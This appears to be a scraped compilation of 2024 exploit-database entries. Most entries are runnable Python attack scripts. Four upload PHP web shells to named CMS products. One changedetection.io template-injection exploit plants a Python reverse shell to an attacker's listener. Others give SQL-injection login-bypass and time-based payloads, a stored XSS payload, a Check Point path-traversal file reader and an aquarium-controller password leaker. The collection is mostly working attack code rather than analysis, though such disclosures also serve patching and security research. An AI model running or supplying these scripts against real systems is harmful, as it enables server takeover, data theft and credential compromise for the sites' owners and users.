<pre><code># Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (RCE)<br /># Date: 05.05.2024<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://monstra.org/<br /># Software Link: https://monstra.org/monstra-3.0.4.zip<br /># Version: 3.0.4<br /># Tested on: MacOS<br /><br />import requests<br />import random<br />import string<br />import time<br />import re<br />import sys<br /><br />if len(sys.argv) < 4:<br />print("Usage: python3 script.py <url> <username> <password>")<br />sys.exit(1)<br /><br />base_url = sys.argv[1]<br />username = sys.argv[2]<br />password = sys.argv[3]<br /><br />session = requests.Session()<br /><br />login_url = f'{base_url}/admin/index.php?id=dashboard'<br />login_data = {<br />'login': username,<br />'password': password,<br />'login_submit': 'Log+In'<br />}<br /><br />filename = ''.join(random.choices(string.ascii_lowercase + string.digits, k=<br />5))<br /><br />print("Logging in...")<br />response = session.post(login_url, data=login_data)<br /><br />if 'Dashboard' in response.text:<br />print("Login successful")<br />else:<br />print("Login failed")<br />exit()<br /><br />time.sleep(3)<br /><br />edit_url = f'{base_url}/admin/index.php?id=themes&action=add_chunk'<br />response = session.get(edit_url) # CSRF token bulmak için edit sayfasına<br />erişim<br /><br />token_search = re.search(r'input type="hidden" id="csrf" name="csrf" value="<br />(.*?)"', response.text)<br />if token_search:<br />token = token_search.group(1)<br />else:<br />print("CSRF token could not be found.")<br />exit()<br /><br />content = '''<br /><html><br /><body><br /><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><br /><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><br /><input type="SUBMIT" value="Execute"><br /></form><br /><pre><br /><?php<br />if(isset($_GET['cmd']))<br />{<br />system($_GET['cmd']);<br />}<br />?><br /></pre><br /></body><br /></html><br />'''<br /><br />edit_data = {<br />'csrf': token,<br />'name': filename,<br />'content': content,<br />'add_file': 'Save'<br />}<br /><br />print("Preparing shell...")<br />response = session.post(edit_url, data=edit_data)<br />time.sleep(3)<br /><br />if response.status_code == 200:<br />print(f"Your shell is ready: {base_url}/public/themes/default/{filename}<br />.chunk.php")<br />else:<br />print("Failed to prepare shell.")<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Dotclear 2.29 - Remote Code Execution (RCE)<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 26.04.2024<br /># Vendor Homepage: https://git.dotclear.org/explore/repos<br /># Software Link:<br />https://github.com/dotclear/dotclear/archive/refs/heads/master.zip<br /># Tested Version: v2.29 (latest)<br /># Tested on: MacOS<br /><br />import requests<br />import time<br />import random<br />import string<br />from bs4 import BeautifulSoup<br /><br />def generate_filename(extension=".inc"):<br />return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +<br />extension<br /><br />def get_csrf_token(response_text):<br />soup = BeautifulSoup(response_text, 'html.parser')<br />token = soup.find('input', {'name': 'xd_check'})<br />return token['value'] if token else None<br /><br />def login(base_url, username, password):<br />print("Exploiting...")<br />time.sleep(1)<br />print("Logging in...")<br />time.sleep(1)<br />session = requests.Session()<br />login_data = {<br />"user_id": username,<br />"user_pwd": password<br />}<br />login_url = f"{base_url}/admin/index.php?process=Auth"<br />login_response = session.post(login_url, data=login_data)<br />if "Logout" in login_response.text:<br />print("Login Successful!")<br />return session<br />else:<br />print("Login Failed!")<br />return None<br /><br />def upload_file(session, base_url, filename):<br />print("Shell Preparing...")<br />time.sleep(1)<br />boundary = "---------------------------376201441124932790524235275389"<br />headers = {<br />"Content-Type": f"multipart/form-data; boundary={boundary}",<br />"X-Requested-With": "XMLHttpRequest"<br />}<br />csrf_token = get_csrf_token(session.get(f"{base_url}<br />/admin/index.php?process=Media").text)<br />payload = (<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n"<br />f"2097152\r\n"<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"xd_check\"\r\n\r\n"<br />f"{csrf_token}\r\n"<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"upfile[]\"; filename=\"{filename}<br />\"\r\n"<br />f"Content-Type: image/jpeg\r\n\r\n"<br />"<html>\n<body>\n<form method=\"GET\" name=\"<?php echo<br />basename($_SERVER['PHP_SELF']); ?>\">\n"<br />"<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input<br />type=\"SUBMIT\" value=\"Execute\">\n"<br />"</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}<br />\n?>\n</pre>\n</body>\n</html>\r\n"<br />f"--{boundary}--\r\n"<br />)<br />upload_response = session.post(f"{base_url}<br />/admin/index.php?process=Media&sortby=name&order=asc&nb=30&page=1&q=&file_mode=grid&file_type=&plugin_id=&popup=0&select=0",<br />headers=headers, data=payload.encode('utf-8'))<br /><br />if upload_response.status_code == 200:<br />print(f"Your Shell is Ready: {base_url}/public/{filename}")<br />else:<br />print("Exploit Failed!")<br /><br />def main(base_url, username, password):<br />filename = generate_filename()<br />session = login(base_url, username, password)<br />if session:<br />upload_file(session, base_url, filename)<br /><br />if __name__ == "__main__":<br />import sys<br />if len(sys.argv) != 4:<br />print("Usage: python script.py <siteurl> <username> <password>")<br />else:<br />base_url = sys.argv[1]<br />username = sys.argv[2]<br />password = sys.argv[3]<br />main(base_url, username, password)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)<br /># Date: 3/5/2024<br /># Exploit Author: Ahmet Ümit BAYRAM<br /># Vendor Homepage: https://wbce-cms.org/<br /># Software Link:<br />https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip<br /># Version: 1.6.2<br /># Tested on: MacOS<br /><br />import requests<br />from bs4 import BeautifulSoup<br />import sys<br />import time<br /><br />def login(url, username, password):<br />print("Logging in...")<br />time.sleep(3)<br />with requests.Session() as session:<br />response = session.get(url + "/admin/login/index.php")<br />soup = BeautifulSoup(response.text, 'html.parser')<br />form = soup.find('form', attrs={'name': 'login'})<br />form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in<br />form.find_all('input') if input_tag.get('type') != 'submit'}<br /># Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle<br />form_data[soup.find('input', {'name': 'username_fieldname'})['value']] =<br />username<br />form_data[soup.find('input', {'name': 'password_fieldname'})['value']] =<br />password<br />post_response = session.post(url + "/admin/login/index.php", data=form_data)<br />if "Administration" in post_response.text:<br />print("Login successful!")<br />time.sleep(3)<br />return session<br />else:<br />print("Login failed.")<br />print("Headers received:", post_response.headers)<br />print("Response content:", post_response.text[:500]) # İlk 500 karakter<br />return None<br /><br />def upload_file(session, url):<br /># Dosya içeriğini ve adını belirleyin<br />print("Shell preparing...")<br />time.sleep(3)<br />files = {'upload[]': ('shell.inc',"""<html><br /><body><br /><form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"><br /><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><br /><input type="SUBMIT" value="Execute"><br /></form><br /><pre><br /><?php<br />if(isset($_GET['cmd']))<br />{<br />system($_GET['cmd']);<br />}<br />?><br /></pre><br /></body><br /></html>""", 'application/octet-stream')}<br />data = {<br />'reqid': '18f3a5c13d42c5',<br />'cmd': 'upload',<br />'target': 'l1_Lw',<br />'mtime[]': '1714669495'<br />}<br />response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",<br />files=files, data=data)<br />if response.status_code == 200:<br />print("Your Shell is Ready: " + url + "/media/shell.inc")<br />else:<br />print("Failed to upload file.")<br />print(response.text)<br /><br />if __name__ == "__main__":<br />url = sys.argv[1]<br />username = sys.argv[2]<br />password = sys.argv[3]<br />session = login(url, username, password)<br />if session:<br />upload_file(session, url)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Serendipity 2.5.0 - Remote Code Execution (RCE)<br /># Discovered by: Ahmet Ümit BAYRAM<br /># Discovered Date: 26.04.2024<br /># Vendor Homepage: https://docs.s9y.org/<br /># Software Link:https://www.s9y.org/latest<br /># Tested Version: v2.5.0 (latest)<br /># Tested on: MacOS<br /><br />import requests<br />import time<br />import random<br />import string<br />from bs4 import BeautifulSoup<br /><br />def generate_filename(extension=".inc"):<br />return ''.join(random.choices(string.ascii_letters + string.digits, k=5)) +<br />extension<br /><br />def get_csrf_token(response):<br />soup = BeautifulSoup(response.text, 'html.parser')<br />token = soup.find('input', {'name': 'serendipity[token]'})<br />return token['value'] if token else None<br /><br />def login(base_url, username, password):<br />print("Logging in...")<br />time.sleep(2)<br />session = requests.Session()<br />login_page = session.get(f"{base_url}/serendipity_admin.php")<br />token = get_csrf_token(login_page)<br />data = {<br />"serendipity[action]": "admin",<br />"serendipity[user]": username,<br />"serendipity[pass]": password,<br />"submit": "Login",<br />"serendipity[token]": token<br />}<br />headers = {<br />"Content-Type": "application/x-www-form-urlencoded",<br />"Referer": f"{base_url}/serendipity_admin.php"<br />}<br />response = session.post(f"{base_url}/serendipity_admin.php", data=data,<br />headers=headers)<br />if "Add media" in response.text:<br />print("Login Successful!")<br />time.sleep(2)<br />return session<br />else:<br />print("Login Failed!")<br />return None<br /><br />def upload_file(session, base_url, filename, token):<br />print("Shell Preparing...")<br />time.sleep(2)<br />boundary = "---------------------------395233558031804950903737832368"<br />headers = {<br />"Content-Type": f"multipart/form-data; boundary={boundary}",<br />"Referer": f"{base_url}<br />/serendipity_admin.php?serendipity[adminModule]=media"<br />}<br />payload = (<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"serendipity[token]\"\r\n\r\n"<br />f"{token}\r\n"<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"serendipity[action]\"\r\n\r\n"<br />f"admin\r\n"<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"serendipity[adminModule]\"\r\n\r\n"<br />f"media\r\n"<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"serendipity[adminAction]\"\r\n\r\n"<br />f"add\r\n"<br />f"--{boundary}\r\n"<br />f"Content-Disposition: form-data; name=\"serendipity[userfile][1]\";<br />filename=\"{filename}\"\r\n"<br />f"Content-Type: text/html\r\n\r\n"<br />"<html>\n<body>\n<form method=\"GET\" name=\"<?php echo<br />basename($_SERVER['PHP_SELF']); ?>\">\n"<br />"<input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\">\n<input<br />type=\"SUBMIT\" value=\"Execute\">\n"<br />"</form>\n<pre>\n<?php\nif(isset($_GET['cmd']))\n{\nsystem($_GET['cmd']);\n}<br />\n?>\n</pre>\n</body>\n</html>\r\n"<br />f"--{boundary}--\r\n"<br />)<br /><br />response = session.post(f"{base_url}<br />/serendipity_admin.php?serendipity[adminModule]=media", headers=headers,<br />data=payload.encode('utf-8'))<br />if f"File {filename} successfully uploaded as" in response.text:<br />print(f"Your shell is ready: {base_url}/uploads/{filename}")<br />else:<br />print("Exploit Failed!")<br /><br />def main(base_url, username, password):<br />filename = generate_filename()<br />session = login(base_url, username, password)<br />if session:<br />token = get_csrf_token(session.get(f"{base_url}<br />/serendipity_admin.php?serendipity[adminModule]=media"))<br />upload_file(session, base_url, filename, token)<br /><br />if __name__ == "__main__":<br />import sys<br />if len(sys.argv) != 4:<br />print("Usage: python script.py <siteurl> <username> <password>")<br />else:<br />main(sys.argv[1], sys.argv[2], sys.argv[3])<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: changedetection <= 0.45.20 Remote Code Execution (RCE)<br /># Date: 5-26-2024<br /># Exploit Author: Zach Crosman (zcrosman)<br /># Vendor Homepage: changedetection.io<br /># Software Link: https://github.com/dgtlmoon/changedetection.io<br /># Version: <= 0.45.20<br /># Tested on: Linux<br /># CVE : CVE-2024-32651<br /><br />from pwn import *<br />import requests<br />from bs4 import BeautifulSoup<br />import argparse<br /><br />def start_listener(port):<br /> listener = listen(port)<br /> print(f"Listening on port {port}...")<br /> conn = listener.wait_for_connection()<br /> print("Connection received!")<br /> context.newline = b'\r\n'<br /> # Switch to interactive mode<br /> conn.interactive()<br /><br />def add_detection(url, listen_ip, listen_port, notification_url=''):<br /> session = requests.Session()<br /> <br /> # First request to get CSRF token<br /> request1_headers = {<br /> "Cache-Control": "max-age=0",<br /> "Upgrade-Insecure-Requests": "1",<br /> "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7",<br /> "Accept-Encoding": "gzip, deflate",<br /> "Accept-Language": "en-US,en;q=0.9",<br /> "Connection": "close"<br /> }<br /><br /> response = session.get(url, headers=request1_headers)<br /> soup = BeautifulSoup(response.text, 'html.parser')<br /> csrf_token = soup.find('input', {'name': 'csrf_token'})['value']<br /> print(f'Obtained CSRF token: {csrf_token}')<br /><br /> # Second request to submit the form and get the redirect URL<br /> add_url = f"{url}/form/add/quickwatch"<br /> add_url_headers = { # Define add_url_headers here<br /> "Origin": url,<br /> "Content-Type": "application/x-www-form-urlencoded"<br /> }<br /> add_url_data = {<br /> "csrf_token": csrf_token,<br /> "url": "https://reddit.com/r/baseball",<br /> "tags": '',<br /> "edit_and_watch_submit_button": "Edit > Watch",<br /> "processor": "text_json_diff"<br /> }<br /><br /> post_response = session.post(add_url, headers=add_url_headers, data=add_url_data, allow_redirects=False)<br /><br /> # Extract the URL from the Location header<br /> if 'Location' in post_response.headers:<br /> redirect_url = post_response.headers['Location']<br /> print(f'Redirect URL: {redirect_url}')<br /> else:<br /> print('No redirect URL found')<br /> return<br /><br /> # Third request to add the changedetection url with ssti in notification config<br /> save_detection_url = f"{url}{redirect_url}"<br /> save_detection_headers = { # Define save_detection_headers here<br /> "Referer": redirect_url,<br /> "Cookie": f"session={session.cookies.get('session')}"<br /> }<br /><br /> save_detection_data = {<br /> "csrf_token": csrf_token,<br /> "url": "https://reddit.com/r/all",<br /> "title": '',<br /> "tags": '',<br /> "time_between_check-weeks": '',<br /> "time_between_check-days": '',<br /> "time_between_check-hours": '',<br /> "time_between_check-minutes": '',<br /> "time_between_check-seconds": '30',<br /> "filter_failure_notification_send": 'y',<br /> "fetch_backend": 'system',<br /> "webdriver_delay": '',<br /> "webdriver_js_execute_code": '',<br /> "method": 'GET',<br /> "headers": '',<br /> "body": '',<br /> "notification_urls": notification_url,<br /> "notification_title": '',<br /> "notification_body": f"""<br /> {{% for x in ().__class__.__base__.__subclasses__() %}}<br /> {{% if "warning" in x.__name__ %}}<br /> {{{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\\"{listen_ip}\\",{listen_port}));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\\"/bin/bash\\")'").read()}}}}<br /> {{% endif %}}<br /> {{% endfor %}}<br /> """,<br /> "notification_format": 'System default',<br /> "include_filters": '',<br /> "subtractive_selectors": '',<br /> "filter_text_added": 'y',<br /> "filter_text_replaced": 'y',<br /> "filter_text_removed": 'y',<br /> "trigger_text": '',<br /> "ignore_text": '',<br /> "text_should_not_be_present": '',<br /> "extract_text": '',<br /> "save_button": 'Save'<br /> }<br /> final_response = session.post(save_detection_url, headers=save_detection_headers, data=save_detection_data)<br /><br /> print('Final request made.')<br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser(description='Add detection and start listener')<br /> parser.add_argument('--url', type=str, required=True, help='Base URL of the target site')<br /> parser.add_argument('--port', type=int, help='Port for the listener', default=4444)<br /> parser.add_argument('--ip', type=str, required=True, help='IP address for the listener')<br /> parser.add_argument('--notification', type=str, help='Notification url if you don\'t want to use the system default')<br /> args = parser.parse_args()<br /><br /><br /> add_detection(args.url, args.ip, args.port, args.notification)<br /> start_listener(args.port)<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Online Payment Hub System - SQLi Authentication Bypass<br /># Date: 29.05.2024<br /># Exploit Author: Hamit Avşar<br /># Vendor Homepage: https://www.sourcecodester.com/php/15018/online-payment-hub-using-php-and-paypal-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=15018&title=Online+Payment+Hub+using+PHP+and+PayPal+Free+Source+Code<br /># Version: 1.0<br /># Tested on: Windows 11, Kali Linux<br /># Online Payment Hub System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.<br /><br />Steps To Reproduce:<br />1 - Go to the login page http://localhost/oph/admin/login.php<br />2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field.<br />3 - Click on "Login" button and you are logged in as administrator.<br /><br />PoC<br /><br />Request<br /><br />POST /oph/classes/Login.php?f=login HTTP/1.1<br />Host: localhost<br />Content-Length: 42<br />sec-ch-ua: "Chromium";v="111", "Not(A:Brand";v="8"<br />Accept: */*<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/oph/admin/login.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=9f8v4097jovtf6a3igi4l6479i<br />Connection: close<br /><br />username=admin'+or+'1'%3D'1&password=hamit<br /><br />--------------------------------------------------------------------------------------------------------------------------------<br /><br />response<br /><br />HTTP/1.1 200 OK<br />Date: Wed, 29 May 2024 17:15:28 GMT<br />Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30<br />X-Powered-By: PHP/8.0.30<br />Expires: Thu, 19 Nov 1981 08:52:00 GMT<br />Cache-Control: no-store, no-cache, must-revalidate<br />Pragma: no-cache<br />Access-Control-Allow-Origin: *<br />Content-Length: 20<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />{"status":"success"}<br /><br /><br /><br /></code></pre>
<pre><code>Exploit Title: BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection<br />Date: 14 Apr 2024<br />Exploit Author: Ivan Spiridonov (xbz0n)<br />Software Link: https://codecanyon.net/item/bwl-advanced-faq-manager/5007135<br />Version: 2.0.3<br />Tested on: Ubuntu 20.04<br />CVE: CVE-2024-32136<br /><br />SQL Injection<br /><br />SQL injection is a type of security vulnerability that allows an attacker to interfere with an application's database queries. It usually involves the insertion or "injection" of an SQL query via the input data from the client into the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.<br /><br />Affected Components<br /><br />Plugin: BWL Advanced FAQ Manager<br />Version: 2.0.3<br />Affected Parameter: 'date_range'<br />Affected Page: /wp-admin/edit.php<br />Description<br /><br />The vulnerability exists within the 'date_range' parameter used in the 'bwl-advanced-faq-analytics' page of the BWL Advanced FAQ Manager plugin. Authenticated attackers can execute arbitrary SQL commands within the database by manipulating the input to this parameter.<br /><br />Proof of Concept<br /><br />Manual Exploitation<br /><br />The following GET request demonstrates the vulnerability:<br /><br />GET /wp-admin/edit.php?page=bwl-advanced-faq-analytics&post_type=bwl_advanced_faq&filter_type=views&date_range=(select*from(select(sleep(20)))a)&faq_id=all HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate, br<br />Referer: http://localhost/wp-admin/edit.php?post_type=bwl_advanced_faq&page=bwl-advanced-faq-analytics<br />Connection: close<br />Cookie: [Relevant Cookies]<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br />If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.<br /><br />Recommendations<br /><br />BWL Advanced FAQ Manager v2.0.3 users are advised to update the plugin to the fixed version v2.0.4.<br /> <br /></code></pre>
<pre><code># Exploit Title: iMLog < 1.307 - Persistent Cross Site Scripting (XSS)<br /># Date: 22/5/2024<br /># Exploit Author: Gabriel Felipe<br /># Vendor Homepage: https://itssglobal.com<br /># Software Link: https://itssglobal.com/index.php/imlog/<br /># Version: 1.307<br /># Tested on: Firefox and Chrome Browsers<br /># Patched Version: 1.308<br /># Category: Web Application<br /># PoC:<br /><br />iMLog < 1.307 is vulnerable to persistent cross-site scripting (XSS) via the "User Management" feature. An attacker could inject malicious javascript code on a controlled user so when an admin goes to the "User Maintenance" malicious code is executed and could lead to new admin user creations resulting in privilege escalation.<br /><br />1. Login to user account<br />2. Go to Setup > "User Maintenance"<br />3. Click on "Search" and then select your UserID.<br />4. Change the "Last Name" input to `<img/src/onerror=prompt('XSS')>`<br />5. Click on "Save"<br />6. Refresh the page, XSS will be triggered.<br /><br /></code></pre>
<pre><code># Exploit Title: Check Point Security Gateway - Information Disclosure (Unauthenticated)<br /># Exploit Author: Yesith Alvarez<br /># Vendor Homepage: https://support.checkpoint.com/results/sk/sk182336<br /># Version: R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, R81.20 <br /># CVE : CVE-2024-24919<br /><br />from requests import Request, Session<br />import sys<br />import json<br /><br /><br /><br />def title():<br /> print('''<br /> <br /> _______ ________ ___ ___ ___ _ _ ___ _ _ ___ __ ___ <br /> / ____\ \ / / ____| |__ \ / _ \__ \| || | |__ \| || | / _ \/_ |/ _ \ <br /> | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______ ) | || || (_) || | (_) |<br /> | | \ \/ / | __|______/ /| | | |/ /|__ _|______/ /|__ _\__, || |\__, |<br /> | |____ \ / | |____ / /_| |_| / /_ | | / /_ | | / / | | / / <br /> \_____| \/ |______| |____|\___/____| |_| |____| |_| /_/ |_| /_/ <br /> <br /> <br /> <br /> <br />Author: Yesith Alvarez<br />Github: https://github.com/yealvarez<br />Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/<br /> ''') <br /><br />def exploit(url, path):<br /> url = url + '/clients/MyCRL'<br /> data = "aCSHELL/../../../../../../../../../../.."+ path<br /> headers = { <br /> 'Connection': 'keep-alive',<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0'<br /> }<br /> s = Session()<br /> req = Request('POST', url, data=data, headers=headers)<br /> prepped = req.prepare()<br /> #del prepped.headers['Content-Type']<br /> resp = s.send(prepped,<br /> verify=False,<br /> timeout=15<br /> ) <br /> print(prepped.headers)<br /> print(url)<br /> print(resp.headers)<br /> print(resp.status_code)<br /><br /><br />if __name__ == '__main__':<br /> title()<br /> if(len(sys.argv) < 3):<br /> print('[+] USAGE: python3 %s https://<target_url> path\n'%(sys.argv[0]))<br /> print('[+] EXAMPLE: python3 %s https://192.168.0.10 "/etc/passwd"\n'%(sys.argv[0])) <br /> exit(0)<br /> else:<br /> exploit(sys.argv[1],sys.argv[2])<br /> <br /><br /></code></pre>
May 31, 2024Check Point Security Gateway Information Disclosure
Check Point Security Gateway suffers from an information disclosure vulnerability. Versions affected include R77.20 (EOL), R77.30 (EOL), R80.10 (EOL), R80.20 (EOL), R80.20.x, R80.20SP (EOL), R80.30 (EOL), R80.30SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.
<pre><code>#!/usr/bin/env python<br /># -*- coding: utf-8 -*-<br />#<br />#<br /># Aquatronica Control System 5.1.6 Passwords Leak Vulnerability<br />#<br />#<br /># Vendor: Aquatronica s.r.l.<br /># Product web page: https://www.aquatronica.com<br /># Affected version: Firmware: 5.1.6<br /># Web: 2.0<br />#<br /># Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy<br /># to use, allowing you to control all the electrical devices in<br /># an aquarium and to monitor all their parameters; it can be used<br /># for soft water aquariums, salt water aquariums or both simultaneously.<br />#<br /># Desc: The tcp.php endpoint on the Aquatronica controller is exposed<br /># to unauthenticated attackers over the network. This vulnerability<br /># allows remote attackers to send a POST request which can reveal<br /># sensitive configuration information, including plaintext passwords.<br /># This can lead to unauthorized access and control over the aquarium<br /># controller, compromising its security and potentially allowing attackers<br /># to manipulate its settings.<br />#<br /># Tested on: Apache/2.0.54 (Unix)<br /># PHP/5.4.17<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2024-5824<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php<br />#<br />#<br /># 04.05.2024<br />#<br /><br />import requests, html, re, sys, time<br />from urllib.parse import unquote<br /><br />program = "TCP"<br />command = "ws_get_network_cfg"<br />function_id = "TCP_XML_REQUEST"<br /><br />print("""<br /> _________ . .<br /> (.. \_ , |\ /|<br /> \ O \ /| \ \/ /<br /> \______ \/ | \ / <br /> vvvv\ \ | / |<br /> \^^^^ == \_/ |<br /> `\_ === \. |<br /> / /\_ \ / |<br /> |/ \_ \| /<br />___ ______________\________/________aquatronica_0day___<br /> | |<br /> | |<br /> | |<br />""")<br /><br />if len(sys.argv) != 2:<br /> print("Usage: python aqua.py <ip:port>")<br /> sys.exit(1)<br /><br />ip = sys.argv[1]<br />url = f"http://{ip}/{program.lower()}.php"<br /><br />post_data = {'function_id' : function_id.lower(),<br /> 'command' : command.upper()}<br /><br />r = requests.post(url, data=post_data)<br /><br />if r.status_code == 200:<br /> r_d = unquote(r.text)<br /> f_d_r = html.unescape(r_d)<br /> regex = r'pwd="([^"]+)"'<br /> rain = re.findall(regex, f_d_r)<br /><br /> for drops in rain:<br /> print(' ',drops)<br /> time.sleep(0.5)<br />else:<br /> print(f"Dry season! {r.status_code}")<br /></code></pre>